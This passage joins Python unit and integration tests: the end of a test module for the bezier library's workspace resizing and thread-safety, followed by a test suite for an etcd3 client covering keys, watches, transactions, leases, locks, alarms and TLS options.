        super_ = super(Test_speedup_geometric_intersect, self)
        super_.test_two_curved_polygons()
        # Make sure the workspace was **not** resized.
        self.assertEqual(triangle_workspace_sizes(), sizes)

    def test_resize_both(self):
        # Start from deliberately tiny workspaces and verify the call
        # grows them to exactly what the intersection needs.
        reset_triangle_workspaces(segment_ends_size=1, segments_size=1)
        super_ = super(Test_speedup_geometric_intersect, self)
        super_.test_two_curved_polygons()
        # Make sure the sizes were resized from (1, 1).
        self.assertEqual(triangle_workspace_sizes(), (2, 6))

    def test_insufficient_segment_ends(self):
        # With resizing disallowed, a too-small segment-ends workspace
        # must raise rather than grow.
        from bezier import _speedup

        reset_triangle_workspaces(segment_ends_size=1)
        sizes = triangle_workspace_sizes()
        with self.assertRaises(ValueError) as exc_info:
            self._two_curved_polygons(resizes_allowed=0)
        exc_args = exc_info.exception.args
        template = _speedup.SEGMENT_ENDS_TOO_SMALL
        self.assertEqual(exc_args, (template.format(2, 1),))
        # Make sure the workspace was **not** resized.
        self.assertEqual(triangle_workspace_sizes(), sizes)

    def test_insufficient_segments(self):
        # Same as above, but for the segments workspace.
        from bezier import _speedup

        reset_triangle_workspaces(segment_ends_size=2, segments_size=2)
        sizes = triangle_workspace_sizes()
        with self.assertRaises(ValueError) as exc_info:
            self._two_curved_polygons(resizes_allowed=0)
        exc_args = exc_info.exception.args
        template = _speedup.SEGMENTS_TOO_SMALL
        self.assertEqual(exc_args, (template.format(6, 2),))
        # Make sure the workspace was **not** resized.
        self.assertEqual(triangle_workspace_sizes(), sizes)
@utils.needs_speedup
class Test_speedup__type_info(unittest.TestCase):
    """Sanity-check the struct/dtype layout reported by ``_speedup``."""

    @staticmethod
    def _call_function_under_test():
        from bezier import _speedup

        return _speedup._type_info()

    def test_it(self):
        result = self._call_function_under_test()
        is_native, item_size, dtype_num, size_of_struct = result
        self.assertTrue(is_native)
        self.assertEqual(dtype_num, 20)
        # Struct size depends on alignment: 24 bytes on 64-bit (and on
        # Windows), 20 bytes on other 32-bit platforms.
        if base_utils.IS_64_BIT or base_utils.IS_WINDOWS:
            self.assertEqual(item_size, 24)
            self.assertEqual(size_of_struct, 24)
        else:  # pragma: NO COVER
            self.assertEqual(item_size, 20)
            self.assertEqual(size_of_struct, 20)
@utils.needs_speedup
class Test_reset_triangle_workspaces(unittest.TestCase):
    """Exercise workspace resetting, including its (known) lack of
    thread-safety."""

    @staticmethod
    def _call_function_under_test(**kwargs):
        return reset_triangle_workspaces(**kwargs)

    def test_it(self):
        return_value = self._call_function_under_test(
            segment_ends_size=1, segments_size=2
        )
        self.assertIsNone(return_value)
        self.assertEqual(triangle_workspace_sizes(), (1, 2))

    # The workspace is module-global state shared by all threads, so this
    # test documents the expected-but-broken behavior and is marked as an
    # expected failure.
    @unittest.expectedFailure
    def test_threadsafe(self):
        sizes_main = (4, 3)
        self._call_function_under_test(
            segment_ends_size=sizes_main[0], segments_size=sizes_main[1]
        )
        worker = WorkspaceThreadedAccess()
        self.assertIsNone(worker.sizes1)
        self.assertIsNone(worker.sizes2)
        sizes1 = (1, 3)
        sizes2 = (2, 2)
        thread1 = threading.Thread(target=worker.task1, args=(sizes1,))
        thread2 = threading.Thread(target=worker.task2, args=(sizes2,))
        thread1.start()
        thread2.start()
        thread1.join()
        thread2.join()
        # This check demonstrates the **broken-ness** of the implementation.
        # The sizes for each thread should be the sizes actually **set** in
        # the given thread and the workspace in the main thread should be
        # unchanged (i.e. should have ``sizes_main``). What we'll actually
        # observe is ``(sizes2, sizes1, sizes2)``.
        expected = (sizes1, sizes2, sizes_main)
        actual = (worker.sizes1, worker.sizes2, triangle_workspace_sizes())
        self.assertEqual(actual, expected)
@utils.needs_speedup
class Test_triangle_workspace_sizes(unittest.TestCase):
    """Verify size queries track partial (one-keyword) resets correctly."""

    @staticmethod
    def _call_function_under_test():
        return triangle_workspace_sizes()

    def test_it(self):
        reset_triangle_workspaces(segment_ends_size=3, segments_size=5)
        self.assertEqual(self._call_function_under_test(), (3, 5))
        # Resetting only one size must leave the other untouched.
        reset_triangle_workspaces(segment_ends_size=1)
        self.assertEqual(self._call_function_under_test(), (1, 5))
        reset_triangle_workspaces(segments_size=2)
        self.assertEqual(self._call_function_under_test(), (1, 2))
def reset_triangle_workspaces(**kwargs):
    """Forward workspace-reset keyword arguments to the ``_speedup`` extension."""
    from bezier import _speedup

    reset = _speedup.reset_triangle_workspaces
    return reset(**kwargs)
def triangle_workspace_sizes():
    """Return the ``_speedup`` extension's current workspace sizes."""
    from bezier import _speedup

    query = _speedup.triangle_workspace_sizes
    return query()
class WorkspaceThreadedAccess:
    """Helper that interleaves two threads' workspace accesses in a fixed
    order (event1 -> event2 -> event3 -> event4) using Events as barriers,
    to demonstrate that the workspace is shared global state."""

    def __init__(self):
        self.barrier1 = threading.Event()
        self.barrier2 = threading.Event()
        self.barrier3 = threading.Event()
        # Sizes observed by each task; populated by task1/task2.
        self.sizes1 = None
        self.sizes2 = None

    def event1(self, sizes):
        # NOTE: There is no need to ``wait`` since this is the first event.
        reset_triangle_workspaces(
            segment_ends_size=sizes[0], segments_size=sizes[1]
        )
        self.barrier1.set()

    def event2(self):
        self.barrier1.wait()
        result = triangle_workspace_sizes()
        self.barrier2.set()
        return result

    def event3(self, sizes):
        self.barrier2.wait()
        reset_triangle_workspaces(
            segment_ends_size=sizes[0], segments_size=sizes[1]
        )
        self.barrier3.set()

    def event4(self):
        self.barrier3.wait()
        # NOTE: There is no barrier to ``set`` since this is the last event.
        return triangle_workspace_sizes()

    def task1(self, sizes):
        # Thread 1: set sizes first (event1), read last (event4).
        self.event1(sizes)
        self.sizes1 = self.event4()

    def task2(self, sizes):
        # Thread 2: read after thread 1's set (event2), then overwrite (event3).
        self.sizes2 = self.event2()
        self.event3(sizes)
|
test_etcd3.py
|
"""
Tests for `etcd3` module.
----------------------------------
"""
import base64
import json
import os
import subprocess
import tempfile
import threading
import time
import grpc
from hypothesis import given, settings
from hypothesis.strategies import characters
import mock
import pytest
import six
from six.moves.urllib.parse import urlparse
from tenacity import retry, stop_after_attempt, wait_fixed
import etcd3
import etcd3.etcdrpc as etcdrpc
import etcd3.exceptions
import etcd3.utils as utils
from etcd3.client import EtcdTokenCallCredentials
etcd_version = os.environ.get('TEST_ETCD_VERSION', 'v3.2.8')
os.environ['ETCDCTL_API'] = '3'
# Python 2 has a separate ``long`` integer type; build a tuple suitable for
# isinstance() checks on either major version.
if six.PY2:
    int_types = (int, long)
else:
    int_types = (int,)
# Don't set any deadline in Hypothesis
settings.register_profile("default", deadline=None)
settings.load_profile("default")
def etcdctl(*args):
    """Run the etcdctl CLI with JSON output and return the parsed result.

    Honours PYTHON_ETCD_HTTP_URL as the endpoint when set; echoes the
    full command line for test debugging.
    """
    cmd = ['etcdctl', '-w', 'json']
    endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
    if endpoint:
        cmd += ['--endpoints', endpoint]
    cmd += list(args)
    print(" ".join(cmd))
    output = subprocess.check_output(cmd)
    return json.loads(output.decode('utf-8'))
# def etcdctl2(*args):
# # endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
# # if endpoint:
# # args = ['--endpoints', endpoint] + list(args)
# # args = ['echo', 'pwd', '|', 'etcdctl', '-w', 'json'] + list(args)
# # print(" ".join(args))
# output = subprocess.check_output("echo pwd | ./etcdctl user add root")
# return json.loads(output.decode('utf-8'))
class TestEtcd3(object):
    """Integration tests for the etcd3 client against a live etcd server
    (endpoint taken from PYTHON_ETCD_HTTP_URL when set)."""

    class MockedException(grpc.RpcError):
        # Minimal RpcError stand-in whose code() returns a preset status
        # code, used to drive error-handling paths in mocked tests.
        def __init__(self, code):
            self._code = code

        def code(self):
            return self._code
    @pytest.fixture
    def etcd(self):
        """Yield a connected etcd3 client, then wipe every key once the
        test finishes (retrying the cleanup up to 3 times)."""
        endpoint = os.environ.get('PYTHON_ETCD_HTTP_URL')
        timeout = 5
        if endpoint:
            url = urlparse(endpoint)
            with etcd3.client(host=url.hostname,
                              port=url.port,
                              timeout=timeout) as client:
                yield client
        else:
            with etcd3.client() as client:
                yield client

        @retry(wait=wait_fixed(2), stop=stop_after_attempt(3))
        def delete_keys_definitely():
            # clean up after fixture goes out of scope
            etcdctl('del', '--prefix', '/')
            out = etcdctl('get', '--prefix', '/')
            assert 'kvs' not in out

        delete_keys_definitely()
    def test_get_unknown_key(self, etcd):
        # A missing key yields (None, None) instead of raising.
        value, meta = etcd.get('probably-invalid-key')
        assert value is None
        assert meta is None

    @given(characters(blacklist_categories=['Cs', 'Cc']))
    def test_get_key(self, etcd, string):
        # Values written through etcdctl come back UTF-8 encoded from get().
        etcdctl('put', '/doot/a_key', string)
        returned, _ = etcd.get('/doot/a_key')
        assert returned == string.encode('utf-8')

    @given(characters(blacklist_categories=['Cs', 'Cc']))
    def test_get_random_key(self, etcd, string):
        # Arbitrary (non-surrogate, non-control) unicode key names round-trip.
        etcdctl('put', '/doot/' + string, 'dootdoot')
        returned, _ = etcd.get('/doot/' + string)
        assert returned == b'dootdoot'

    @given(characters(blacklist_categories=['Cs', 'Cc']))
    def test_get_have_cluster_revision(self, etcd, string):
        # get() metadata carries a positive cluster revision.
        etcdctl('put', '/doot/' + string, 'dootdoot')
        _, md = etcd.get('/doot/' + string)
        assert md.response_header.revision > 0

    @given(characters(blacklist_categories=['Cs', 'Cc']))
    def test_put_key(self, etcd, string):
        # put() values are readable back via etcdctl (base64-encoded JSON).
        etcd.put('/doot/put_1', string)
        out = etcdctl('get', '/doot/put_1')
        assert base64.b64decode(out['kvs'][0]['value']) == \
            string.encode('utf-8')
def test_delete_key(self, etcd):
etcdctl('put', '/doot/delete_this', 'delete pls')
v, _ = etcd.get('/doot/delete_this')
assert v == b'delete pls'
deleted = etcd.delete('/doot/delete_this')
assert deleted is True
deleted = etcd.delete('/doot/delete_this')
assert deleted is False
deleted = etcd.delete('/doot/not_here_dude')
assert deleted is False
v, _ = etcd.get('/doot/delete_this')
assert v is None
def test_delete_keys_with_prefix(self, etcd):
    """delete_prefix() removes every key under the prefix and reports the count."""
    for key, val in (('/foo/1', 'bar'), ('/foo/2', 'baz')):
        etcdctl('put', key, val)
    assert etcd.get('/foo/1')[0] == b'bar'
    assert etcd.get('/foo/2')[0] == b'baz'

    response = etcd.delete_prefix('/foo')
    assert response.deleted == 2

    assert etcd.get('/foo/1')[0] is None
    assert etcd.get('/foo/2')[0] is None
def test_watch_key(self, etcd):
    """watch() yields events in write order and stops after cancel().

    A background thread writes '0'..'3' one second apart; the watcher
    cancels after seeing '2', so '3' must never be delivered.
    """
    def update_etcd(v):
        # Write via etcdctl, then verify the write landed.
        etcdctl('put', '/doot/watch', v)
        out = etcdctl('get', '/doot/watch')
        assert base64.b64decode(out['kvs'][0]['value']) == \
            utils.to_bytes(v)

    def update_key():
        # sleep to make watch can get the event
        time.sleep(3)
        update_etcd('0')
        time.sleep(1)
        update_etcd('1')
        time.sleep(1)
        update_etcd('2')
        time.sleep(1)
        update_etcd('3')
        time.sleep(1)

    t = threading.Thread(name="update_key", target=update_key)
    t.start()

    change_count = 0
    events_iterator, cancel = etcd.watch(b'/doot/watch')
    for event in events_iterator:
        assert event.key == b'/doot/watch'
        assert event.value == \
            utils.to_bytes(str(change_count))

        # if cancel worked, we should not receive event 3
        assert event.value != utils.to_bytes('3')

        change_count += 1
        if change_count > 2:
            # if cancel not work, we will block in this for-loop forever
            cancel()

    t.join()
def test_watch_key_with_revision_compacted(self, etcd):
    """Watching from a compacted revision raises RevisionCompactedError,
    and re-watching from the reported compacted revision then succeeds.
    """
    etcdctl('put', '/random', '1')  # Some data to compact

    def update_etcd(v):
        # Write via etcdctl, then verify the write landed.
        etcdctl('put', '/watchcompation', v)
        out = etcdctl('get', '/watchcompation')
        assert base64.b64decode(out['kvs'][0]['value']) == \
            utils.to_bytes(v)

    def update_key():
        # sleep to make watch can get the event
        time.sleep(3)
        update_etcd('0')
        time.sleep(1)
        update_etcd('1')
        time.sleep(1)
        update_etcd('2')
        time.sleep(1)
        update_etcd('3')
        time.sleep(1)

    t = threading.Thread(name="update_key", target=update_key)
    t.start()

    def watch_compacted_revision_test():
        # Start watching from revision 1, which is compacted below.
        events_iterator, cancel = etcd.watch(
            b'/watchcompation', start_revision=1)

        error_raised = False
        compacted_revision = 0
        try:
            next(events_iterator)
        except Exception as err:
            error_raised = True
            assert isinstance(err,
                              etcd3.exceptions.RevisionCompactedError)
            compacted_revision = err.compacted_revision

        assert error_raised is True
        assert compacted_revision == 2

        # Re-watch from the compacted revision: events flow normally.
        change_count = 0
        events_iterator, cancel = etcd.watch(
            b'/watchcompation', start_revision=compacted_revision)
        for event in events_iterator:
            assert event.key == b'/watchcompation'
            assert event.value == \
                utils.to_bytes(str(change_count))

            # if cancel worked, we should not receive event 3
            assert event.value != utils.to_bytes('3')

            change_count += 1
            if change_count > 2:
                cancel()

    # Compact etcd and test watcher
    etcd.compact(2)

    watch_compacted_revision_test()

    t.join()
def test_watch_exception_during_watch(self, etcd):
    """An UNAVAILABLE error delivered asynchronously to the watch callback
    surfaces to the iterating caller as ConnectionFailedError."""
    def pass_exception_to_callback(callback):
        time.sleep(1)
        callback(self.MockedException(grpc.StatusCode.UNAVAILABLE))

    def add_callback_mock(*args, **kwargs):
        # args[1] is the callback watch() registers with the watcher.
        callback = args[1]
        t = threading.Thread(name="pass_exception_to_callback",
                             target=pass_exception_to_callback,
                             args=[callback])
        t.start()
        return 1

    watcher_mock = mock.MagicMock()
    watcher_mock.add_callback = add_callback_mock
    etcd.watcher = watcher_mock

    events_iterator, cancel = etcd.watch('foo')

    with pytest.raises(etcd3.exceptions.ConnectionFailedError):
        for _ in events_iterator:
            pass
def test_watch_timeout_on_establishment(self, etcd):
    """watch() raises WatchTimedOut when the stream can't be established in time."""
    foo_etcd = etcd3.client(timeout=3)

    def slow_watch_mock(*args, **kwargs):
        # Stall longer than the 3s client timeout so establishment fails.
        time.sleep(4)

    foo_etcd.watcher._watch_stub.Watch = slow_watch_mock  # noqa

    with pytest.raises(etcd3.exceptions.WatchTimedOut):
        foo_etcd.watch('foo')
def test_watch_prefix(self, etcd):
    """watch_prefix() delivers events for every key under the prefix,
    in write order, and stops after cancel() (so key '3' never arrives).
    """
    def update_etcd(v):
        # Write via etcdctl, then verify the write landed.
        etcdctl('put', '/doot/watch/prefix/' + v, v)
        out = etcdctl('get', '/doot/watch/prefix/' + v)
        assert base64.b64decode(out['kvs'][0]['value']) == \
            utils.to_bytes(v)

    def update_key():
        # sleep to make watch can get the event
        time.sleep(3)
        update_etcd('0')
        time.sleep(1)
        update_etcd('1')
        time.sleep(1)
        update_etcd('2')
        time.sleep(1)
        update_etcd('3')
        time.sleep(1)

    t = threading.Thread(name="update_key_prefix", target=update_key)
    t.start()

    change_count = 0
    events_iterator, cancel = etcd.watch_prefix('/doot/watch/prefix/')
    for event in events_iterator:
        assert event.key == \
            utils.to_bytes('/doot/watch/prefix/{}'.format(change_count))
        assert event.value == \
            utils.to_bytes(str(change_count))

        # if cancel worked, we should not receive event 3
        assert event.value != utils.to_bytes('3')

        change_count += 1
        if change_count > 2:
            # if cancel not work, we will block in this for-loop forever
            cancel()

    t.join()
def test_sequential_watch_prefix_once(self, etcd):
    """watch_prefix_once() must be callable repeatedly on the same prefix.

    Each 1-second watch may simply time out since nothing touches the
    prefix; only unexpected errors should propagate. The original spelled
    the identical try/except out three times — a loop keeps the retry
    count in one place.
    """
    for _ in range(3):
        try:
            etcd.watch_prefix_once('/doot/', 1)
        except etcd3.exceptions.WatchTimedOut:
            pass
def test_transaction_success(self, etcd):
    """When the compare clause matches, the success ops are applied."""
    etcdctl('put', '/doot/txn', 'dootdoot')
    etcd.transaction(
        compare=[etcd.transactions.value('/doot/txn') == 'dootdoot'],
        success=[etcd.transactions.put('/doot/txn', 'success')],
        failure=[etcd.transactions.put('/doot/txn', 'failure')]
    )
    stored = base64.b64decode(etcdctl('get', '/doot/txn')['kvs'][0]['value'])
    assert stored == b'success'
def test_transaction_failure(self, etcd):
    """When the compare clause does not match, the failure ops are applied."""
    etcdctl('put', '/doot/txn', 'notdootdoot')
    etcd.transaction(
        compare=[etcd.transactions.value('/doot/txn') == 'dootdoot'],
        success=[etcd.transactions.put('/doot/txn', 'success')],
        failure=[etcd.transactions.put('/doot/txn', 'failure')]
    )
    stored = base64.b64decode(etcdctl('get', '/doot/txn')['kvs'][0]['value'])
    assert stored == b'failure'
def test_ops_to_requests(self, etcd):
    """_ops_to_requests rejects non-list input and non-transaction items."""
    with pytest.raises(TypeError):
        etcd._ops_to_requests(0)
    with pytest.raises(Exception):
        etcd._ops_to_requests(['not_transaction_type'])
def test_replace_success(self, etcd):
    """replace() swaps the value and returns True when the old value matches."""
    etcd.put('/doot/thing', 'toot')
    assert etcd.replace('/doot/thing', 'toot', 'doot') is True
    value, _ = etcd.get('/doot/thing')
    assert value == b'doot'
def test_replace_fail(self, etcd):
    """replace() leaves the value untouched and returns False on a mismatch."""
    etcd.put('/doot/thing', 'boot')
    assert etcd.replace('/doot/thing', 'toot', 'doot') is False
    value, _ = etcd.get('/doot/thing')
    assert value == b'boot'
def test_get_prefix(self, etcd):
    """get_prefix() returns exactly the keys under the prefix, no others."""
    for i in range(20):
        etcdctl('put', '/doot/range{}'.format(i), 'i am a range')
    for i in range(5):
        etcdctl('put', '/doot/notrange{}'.format(i), 'i am a not range')

    values = list(etcd.get_prefix('/doot/range'))
    assert len(values) == 20
    assert all(value == b'i am a range' for value, _ in values)
def test_all_not_found_error(self, etcd):
    """get_all() on an empty store yields nothing."""
    assert list(etcd.get_all()) == []
def test_range_not_found_error(self, etcd):
    """get_prefix() with no matching keys yields nothing."""
    for i in range(5):
        etcdctl('put', '/doot/notrange{}'.format(i), 'i am a not range')
    assert list(etcd.get_prefix('/doot/range')) == []
def test_get_all(self, etcd):
    """get_all() returns every key in the store regardless of prefix."""
    for i in range(20):
        etcdctl('put', '/doot/range{}'.format(i), 'i am in all')
    for i in range(5):
        etcdctl('put', '/doot/notrange{}'.format(i), 'i am in all')

    values = list(etcd.get_all())
    assert len(values) == 25
    assert all(value == b'i am in all' for value, _ in values)
def test_sort_order(self, etcd):
    """sort_order='ascend'/'descend' orders get_prefix results by key."""
    initial_keys = 'abcde'
    initial_values = 'qwert'
    for k, v in zip(initial_keys, initial_values):
        etcdctl('put', '/doot/{}'.format(k), v)

    def collect_key_suffixes(order):
        # Concatenate each returned key with its '/doot/' prefix stripped.
        return ''.join(meta.key.decode('utf-8')[len('/doot/'):]
                       for _, meta in etcd.get_prefix('/doot', sort_order=order))

    assert collect_key_suffixes('ascend') == initial_keys
    assert collect_key_suffixes('descend') == ''.join(reversed(initial_keys))
def test_lease_grant(self, etcd):
    """A granted lease exposes integer ttl and id attributes."""
    grant = etcd.lease(1)
    assert isinstance(grant.ttl, int_types)
    assert isinstance(grant.id, int_types)
def test_lease_revoke(self, etcd):
    # Revoking a freshly granted lease must not raise.
    lease = etcd.lease(1)
    lease.revoke()
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
                    reason="requires etcd v3.1 or higher")
def test_lease_keys_empty(self, etcd):
    """A fresh lease has no attached keys."""
    lease = etcd.lease(1)
    assert lease.keys == []
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
                    reason="requires etcd v3.1 or higher")
def test_lease_single_key(self, etcd):
    """A key put under a lease shows up in the lease's key list."""
    grant = etcd.lease(1)
    etcd.put('/doot/lease_test', 'this is a lease', lease=grant)
    assert grant.keys == [b'/doot/lease_test']
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
                    reason="requires etcd v3.1 or higher")
def test_lease_expire(self, etcd):
    """A key attached to a 1s lease disappears once the lease expires."""
    key = '/doot/lease_test_expire'
    lease = etcd.lease(1)
    etcd.put(key, 'this is a lease', lease=lease)
    assert lease.keys == [utils.to_bytes(key)]
    v, _ = etcd.get(key)
    assert v == b'this is a lease'
    assert lease.remaining_ttl <= lease.granted_ttl

    # wait for the lease to expire
    time.sleep(lease.granted_ttl + 2)
    v, _ = etcd.get(key)
    assert v is None
def test_member_list_single(self, etcd):
    """Against a single-node etcd there is exactly one member, named 'default'.

    NOTE: if tests are run against an etcd cluster rather than a single
    node, this test will need to be changed.
    """
    assert len(list(etcd.members)) == 1
    for member in etcd.members:
        assert member.name == 'default'
        assert all(url.startswith('http://') for url in member.peer_urls)
        assert all(url.startswith('http://') for url in member.client_urls)
        assert isinstance(member.id, int_types)
def test_lock_acquire(self, etcd):
    """A held lock cannot be acquired again, with or without waiting."""
    lk = etcd.lock('lock-1', ttl=10)
    assert lk.acquire() is True
    assert etcd.get(lk.key)[0] is not None
    # Both a non-blocking and a short blocking attempt must fail while held.
    assert lk.acquire(timeout=0) is False
    assert lk.acquire(timeout=1) is False
def test_lock_release(self, etcd):
    """Releasing a lock removes its key and allows re-acquisition."""
    lk = etcd.lock('lock-2', ttl=10)
    assert lk.acquire() is True
    assert etcd.get(lk.key)[0] is not None
    assert lk.release() is True
    assert etcd.get(lk.key)[0] is None
    # The lock can be taken and released again, including a blocking acquire.
    assert lk.acquire() is True
    assert lk.release() is True
    assert lk.acquire(timeout=None) is True
def test_lock_expire(self, etcd):
    """An unrefreshed lock's key vanishes after its TTL elapses."""
    lock = etcd.lock('lock-3', ttl=3)
    assert lock.acquire() is True
    assert etcd.get(lock.key)[0] is not None
    # wait for the lease to expire
    time.sleep(9)
    v, _ = etcd.get(lock.key)
    assert v is None
def test_lock_refresh(self, etcd):
    """Refreshing a 3s-TTL lock every second keeps it alive past the TTL."""
    lock = etcd.lock('lock-4', ttl=3)
    assert lock.acquire() is True
    assert etcd.get(lock.key)[0] is not None
    # sleep for the same total time as test_lock_expire, but refresh each
    # second
    for _ in range(9):
        time.sleep(1)
        lock.refresh()

    assert etcd.get(lock.key)[0] is not None
def test_lock_is_acquired(self, etcd):
    """is_acquired() reflects only the asking lock object's own ownership."""
    first = etcd.lock('lock-5', ttl=2)
    assert first.is_acquired() is False

    second = etcd.lock('lock-5', ttl=2)
    second.acquire()
    assert second.is_acquired() is True
    second.release()

    third = etcd.lock('lock-5', ttl=2)
    third.acquire()
    assert third.is_acquired() is True
    # A released holder no longer reports ownership even though the name is held.
    assert second.is_acquired() is False
def test_lock_context_manager(self, etcd):
    """The lock is held inside the with-block and released on exit."""
    with etcd.lock('lock-6', ttl=2) as lk:
        assert lk.is_acquired() is True
    assert lk.is_acquired() is False
def test_lock_contended(self, etcd):
    """Once another client acquires the same lock name, the first holder loses it."""
    holder = etcd.lock('lock-7', ttl=2)
    holder.acquire()
    challenger = etcd.lock('lock-7', ttl=2)
    challenger.acquire()
    assert holder.is_acquired() is False
    assert challenger.is_acquired() is True
def test_lock_double_acquire_release(self, etcd):
    """A non-blocking re-acquire of a held lock fails; release succeeds."""
    lk = etcd.lock('lock-8', ttl=10)
    assert lk.acquire(0) is True
    assert lk.acquire(0) is False
    assert lk.release() is True
def test_lock_acquire_none(self, etcd):
    """acquire(None) blocks until the lock becomes available."""
    lock = etcd.lock('lock-9', ttl=10)
    assert lock.acquire(None) is True
    # This will succeed after 10 seconds since the TTL will expire and the
    # lock is not refreshed
    assert lock.acquire(None) is True
def test_internal_exception_on_internal_error(self, etcd):
    """A gRPC INTERNAL status surfaces as InternalServerError."""
    kv_mock = mock.MagicMock()
    kv_mock.Range.side_effect = self.MockedException(grpc.StatusCode.INTERNAL)
    etcd.kvstub = kv_mock
    with pytest.raises(etcd3.exceptions.InternalServerError):
        etcd.get("foo")
def test_connection_failure_exception_on_connection_failure(self, etcd):
    """A gRPC UNAVAILABLE status surfaces as ConnectionFailedError."""
    kv_mock = mock.MagicMock()
    kv_mock.Range.side_effect = self.MockedException(grpc.StatusCode.UNAVAILABLE)
    etcd.kvstub = kv_mock
    with pytest.raises(etcd3.exceptions.ConnectionFailedError):
        etcd.get("foo")
def test_connection_timeout_exception_on_connection_timeout(self, etcd):
    """A gRPC DEADLINE_EXCEEDED status surfaces as ConnectionTimeoutError."""
    kv_mock = mock.MagicMock()
    kv_mock.Range.side_effect = self.MockedException(grpc.StatusCode.DEADLINE_EXCEEDED)
    etcd.kvstub = kv_mock
    with pytest.raises(etcd3.exceptions.ConnectionTimeoutError):
        etcd.get("foo")
def test_grpc_exception_on_unknown_code(self, etcd):
    """Unmapped gRPC statuses (e.g. DATA_LOSS) propagate as raw grpc.RpcError."""
    kv_mock = mock.MagicMock()
    kv_mock.Range.side_effect = self.MockedException(grpc.StatusCode.DATA_LOSS)
    etcd.kvstub = kv_mock
    with pytest.raises(grpc.RpcError):
        etcd.get("foo")
def test_status_member(self, etcd):
    """status() reports a leader that is one of the cluster members."""
    status = etcd.status()
    assert isinstance(status.leader, etcd3.members.Member)
    member_ids = [m.id for m in etcd.members]
    assert status.leader.id in member_ids
def test_hash(self, etcd):
    # hash() of the backend KV store is an integer.
    assert isinstance(etcd.hash(), int)
def test_snapshot(self, etcd):
    """snapshot() writes a file that etcdctl accepts as a valid snapshot."""
    with tempfile.NamedTemporaryFile() as snap:
        etcd.snapshot(snap)
        snap.flush()
        # etcdctl validates the snapshot file format.
        etcdctl('snapshot', 'status', snap.name)
class TestAlarms(object):
    """Tests for creating, listing and disarming etcd NOSPACE alarms."""
    @pytest.fixture
    def etcd(self):
        """Yield a client and disarm any alarms the test left behind."""
        etcd = etcd3.client()
        yield etcd
        etcd.disarm_alarm()
        for m in etcd.members:
            if m.active_alarms:
                etcd.disarm_alarm(m.id)

    def test_create_alarm_all_members(self, etcd):
        """create_alarm() without a member targets the whole cluster (member_id 0)."""
        alarms = etcd.create_alarm()

        assert len(alarms) == 1
        assert alarms[0].member_id == 0
        assert alarms[0].alarm_type == etcdrpc.NOSPACE

    def test_create_alarm_specific_member(self, etcd):
        """create_alarm(member_id=...) raises the alarm on that member only."""
        a_member = next(etcd.members)

        alarms = etcd.create_alarm(member_id=a_member.id)

        assert len(alarms) == 1
        assert alarms[0].member_id == a_member.id
        assert alarms[0].alarm_type == etcdrpc.NOSPACE

    def test_list_alarms(self, etcd):
        """list_alarms() returns both the cluster-wide and member-specific alarms."""
        a_member = next(etcd.members)
        etcd.create_alarm()
        etcd.create_alarm(member_id=a_member.id)
        possible_member_ids = [0, a_member.id]

        alarms = list(etcd.list_alarms())

        assert len(alarms) == 2
        for alarm in alarms:
            possible_member_ids.remove(alarm.member_id)
            assert alarm.alarm_type == etcdrpc.NOSPACE

        # Each expected member id was seen exactly once.
        assert possible_member_ids == []

    def test_disarm_alarm(self, etcd):
        """disarm_alarm() clears a previously raised alarm."""
        etcd.create_alarm()
        assert len(list(etcd.list_alarms())) == 1

        etcd.disarm_alarm()
        assert len(list(etcd.list_alarms())) == 0
class TestUtils(object):
    """Unit tests for etcd3.utils helpers."""

    def test_increment_last_byte(self):
        # 'foo' -> 'fop': used to build exclusive range ends for prefix scans.
        assert etcd3.utils.increment_last_byte(b'foo') == b'fop'

    def test_to_bytes(self):
        # Both str and bytes inputs normalize to the same bytes value.
        for value in (b'doot', 'doot'):
            converted = etcd3.utils.to_bytes(value)
            assert isinstance(converted, bytes)
            assert converted == b'doot'
class TestEtcdTokenCallCredentials(object):
    """Tests for the gRPC call-credentials wrapper carrying the auth token."""

    def test_token_callback(self):
        creds = EtcdTokenCallCredentials('foo')
        callback = mock.MagicMock()
        creds(None, callback)
        # The token must be handed to gRPC as metadata, with no error.
        expected_metadata = (('token', 'foo'),)
        callback.assert_called_once_with(expected_metadata, None)
class TestClient(object):
    """Unit tests for client construction options and request building."""
    @pytest.fixture
    def etcd(self):
        # Plain default client; these tests need no key cleanup.
        yield etcd3.client()

    def test_sort_target(self, etcd):
        """Each sort_target keyword maps to the matching RangeRequest enum."""
        key = 'key'.encode('utf-8')
        sort_target = {
            None: etcdrpc.RangeRequest.KEY,
            'key': etcdrpc.RangeRequest.KEY,
            'version': etcdrpc.RangeRequest.VERSION,
            'create': etcdrpc.RangeRequest.CREATE,
            'mod': etcdrpc.RangeRequest.MOD,
            'value': etcdrpc.RangeRequest.VALUE,
        }

        for input, expected in sort_target.items():
            range_request = etcd._build_get_range_request(key,
                                                          sort_target=input)
            assert range_request.sort_target == expected
        with pytest.raises(ValueError):
            etcd._build_get_range_request(key, sort_target='feelsbadman')

    def test_sort_order(self, etcd):
        """Each sort_order keyword maps to the matching RangeRequest enum."""
        key = 'key'.encode('utf-8')
        sort_target = {
            None: etcdrpc.RangeRequest.NONE,
            'ascend': etcdrpc.RangeRequest.ASCEND,
            'descend': etcdrpc.RangeRequest.DESCEND,
        }

        for input, expected in sort_target.items():
            range_request = etcd._build_get_range_request(key,
                                                          sort_order=input)
            assert range_request.sort_order == expected
        with pytest.raises(ValueError):
            etcd._build_get_range_request(key, sort_order='feelsbadman')

    def test_secure_channel(self):
        """A full CA/key/cert triple yields a secure channel."""
        client = etcd3.client(
            ca_cert="tests/ca.crt",
            cert_key="tests/client.key",
            cert_cert="tests/client.crt"
        )
        assert client.uses_secure_channel is True

    def test_secure_channel_ca_cert_only(self):
        """A CA cert alone (no client cert/key) still yields a secure channel."""
        client = etcd3.client(
            ca_cert="tests/ca.crt",
            cert_key=None,
            cert_cert=None
        )
        assert client.uses_secure_channel is True

    def test_secure_channel_ca_cert_and_key_raise_exception(self):
        """Providing only one of cert_key/cert_cert is rejected with ValueError."""
        with pytest.raises(ValueError):
            etcd3.client(
                ca_cert='tests/ca.crt',
                cert_key='tests/client.crt',
                cert_cert=None)

        with pytest.raises(ValueError):
            etcd3.client(
                ca_cert='tests/ca.crt',
                cert_key=None,
                cert_cert='tests/client.crt')

    def test_compact(self, etcd):
        """Compacting the same revision twice raises (already compacted)."""
        etcd.compact(3)
        with pytest.raises(grpc.RpcError):
